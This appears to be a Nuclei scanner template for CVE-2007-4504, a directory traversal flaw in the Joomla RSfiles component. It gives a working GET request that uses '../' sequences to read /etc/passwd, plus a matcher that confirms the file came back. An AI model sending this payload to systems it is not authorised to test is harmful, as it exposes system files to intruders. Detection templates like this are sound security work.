# 2021-11-09 22:49:13 +00:00
# 2022-06-18 08:05:25 +00:00
id: CVE-2007-4504

info:
  name: Joomla! Component RSfiles <=1.0.2 - Arbitrary File Retrieval
  author: daffainfo
  severity: high
  description: An arbitrary file retrieval vulnerability in index.php in the RSfiles component (com_rsfiles) <=1.0.2 for Joomla! allows remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action.
  reference:
    - https://www.exploit-db.com/exploits/4307
    - https://www.cvedetails.com/cve/CVE-2007-4504
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/36222
  classification:
    cve-id: CVE-2007-4504
  tags: cve,cve2007,joomla,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200